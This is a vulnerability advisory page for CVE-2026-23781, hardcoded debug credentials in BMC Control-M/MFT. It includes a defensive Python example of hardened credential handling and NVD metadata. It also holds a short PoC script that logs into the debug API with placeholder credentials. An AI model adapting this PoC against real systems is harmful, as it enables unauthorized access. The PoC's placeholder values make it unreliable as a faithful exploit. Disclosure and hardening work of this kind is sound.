Security Vulnerability Report
CVE-2026-23781 CVSS 9.8 CRITICAL

CVE-2026-23781

Published: 2026-04-10 16:16:30
Last Modified: 2026-04-27 19:11:39

Description

An issue was discovered in BMC Control-M/MFT 9.0.20 through 9.0.22. A set of default debug user credentials is hardcoded in cleartext within the application package. If left unchanged, these credentials can be easily obtained and may allow unauthorized access to the MFT API debug interface.
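The weakness described above is the one catalogued as CWE-798 in this report's metadata: a credential pair that ships inside the package and is therefore identical on every installation and readable by anyone who has the package. As an added illustration that is not part of this report or of BMC's code, the following Python contrasts that vulnerable pattern with a hardened replacement: the debug interface stays off unless explicitly enabled, the credential comes from the deployment rather than the code, known shipped defaults are refused at startup, and verification uses a salted PBKDF2 hash compared in constant time. The `MFT_DEBUG_*` variable names and the default pair `debug_user`/`hardcoded_password` are constructed placeholders (the latter echoing the PoC's own placeholders), not vendor identifiers.

```python
"""Vulnerable vs. hardened handling of a debug-interface credential (CWE-798).

Added illustration only; not vendor code.  All names below are constructed.
"""
import hashlib
import hmac
import os
import secrets

# --- Vulnerable pattern: credential baked into the shipped code ---------------
# Every installation shares this pair, and it is recoverable from the package.
VULNERABLE_DEBUG_USER = "debug_user"              # constructed placeholder
VULNERABLE_DEBUG_PASSWORD = "hardcoded_password"  # constructed placeholder


def vulnerable_check(username, password):
    """Accept the request if it matches the constants compiled into the code."""
    return username == VULNERABLE_DEBUG_USER and password == VULNERABLE_DEBUG_PASSWORD


# --- Hardened pattern ---------------------------------------------------------
# Pairs known to ship as defaults; a deployment is refused if it still uses one.
KNOWN_DEFAULT_PAIRS = {(VULNERABLE_DEBUG_USER, VULNERABLE_DEBUG_PASSWORD)}
MIN_PASSWORD_LENGTH = 16
PBKDF2_ROUNDS = 200_000


def check_debug_config(env):
    """Validate debug-interface settings from `env` (a mapping such as os.environ).

    Returns (state, detail):
      "disabled" -> the interface is off (the default when nothing is set)
      "reject"   -> detail is the reason the service must refuse to start
      "ok"       -> detail is a verifier dict holding a salted PBKDF2 digest
    Variable names MFT_DEBUG_* are hypothetical.
    """
    if env.get("MFT_DEBUG_API_ENABLED", "false").strip().lower() != "true":
        return "disabled", "debug interface not enabled"
    user = env.get("MFT_DEBUG_USER", "")
    password = env.get("MFT_DEBUG_PASSWORD", "")
    if not user or not password:
        return "reject", "debug interface enabled without credentials"
    if (user, password) in KNOWN_DEFAULT_PAIRS:
        return "reject", "shipped default credentials must be changed"
    if len(password) < MIN_PASSWORD_LENGTH:
        return "reject", f"password shorter than {MIN_PASSWORD_LENGTH} characters"
    # Store only a salted, stretched digest; the cleartext is never kept.
    salt = secrets.token_bytes(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return "ok", {"user": user, "salt": salt, "digest": digest}


def hardened_check(verifier, username, password):
    """Constant-time comparison of a presented credential against the verifier."""
    candidate = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), verifier["salt"], PBKDF2_ROUNDS
    )
    user_ok = hmac.compare_digest(username.encode(), verifier["user"].encode())
    pass_ok = hmac.compare_digest(candidate, verifier["digest"])
    return user_ok and pass_ok


if __name__ == "__main__":
    # Constructed deployment settings; a real service would pass os.environ.
    samples = {
        "unset": {},
        "defaults left in place": {
            "MFT_DEBUG_API_ENABLED": "true",
            "MFT_DEBUG_USER": "debug_user",
            "MFT_DEBUG_PASSWORD": "hardcoded_password",
        },
        "properly configured": {
            "MFT_DEBUG_API_ENABLED": "true",
            "MFT_DEBUG_USER": "ops",
            "MFT_DEBUG_PASSWORD": "correct-horse-battery-staple-42",
        },
    }
    for label, env in samples.items():
        state, detail = check_debug_config(env)
        print(f"{label:24s} -> {state}" + ("" if state == "ok" else f": {detail}"))
    print("live environment      ->", check_debug_config(os.environ)[0])
```

The startup check is the part that matters operationally: a service that refuses to come up while a known default pair is configured turns "if left unchanged" from a silent exposure into a visible deployment error, and keeping the interface disabled by default removes the exposure entirely for installations that never need it.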

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:bmc:control-m\/managed_file_transfer:*:*:*:*:*:*:*:* - VULNERABLE
BMC Control-M/MFT 9.0.20
BMC Control-M/MFT 9.0.21
BMC Control-M/MFT 9.0.22

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Target URL for the MFT API Debug Interface
target_url = "http://target-host:port/mft/api/debug"

# Hardcoded credentials extracted from the application package
username = "debug_user"
password = "hardcoded_password"


def exploit():
    print(f"[*] Attempting to connect to {target_url}...")
    # Example using Basic Authentication
    response = requests.get(target_url, auth=(username, password), verify=False)
    if response.status_code == 200:
        print("[+] Exploit successful! Access granted to debug interface.")
        print("[+] Response data:")
        print(response.text)
    else:
        print("[-] Exploit failed.")
        print(f"[-] Status code: {response.status_code}")


if __name__ == "__main__":
    exploit()
```

References

https://docs.bmc.com/xwiki/bin/view/Control-M-Orchestration/Control-M/ctm9022/Patches/Control-M-MFT-PAAFP-9-0-22-025/ (Patch)
https://www.bmc.com/support/resources/issue-defect-management.html (Vendor Advisory)
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-23781",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-10T16:16:30.400",
    "lastModified": "2026-04-27T19:11:38.623",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "An issue was discovered in BMC Control-M/MFT 9.0.20 through 9.0.22. A set of default debug user credentials is hardcoded in cleartext within the application package. If left unchanged, these credentials can be easily obtained and may allow unauthorized access to the MFT API debug interface."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-798"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:bmc:control-m\\/managed_file_transfer:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "9.0.20",
                "versionEndIncluding": "9.0.22",
                "matchCriteriaId": "F19C6505-D28F-4BF0-B347-789719492E0E"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://docs.bmc.com/xwiki/bin/view/Control-M-Orchestration/Control-M/ctm9022/Patches/Control-M-MFT-PAAFP-9-0-22-025/",
        "source": "[email protected]",
        "tags": ["Patch"]
      },
      {
        "url": "https://www.bmc.com/support/resources/issue-defect-management.html",
        "source": "[email protected]",
        "tags": ["Vendor Advisory"]
      }
    ]
  }
}
```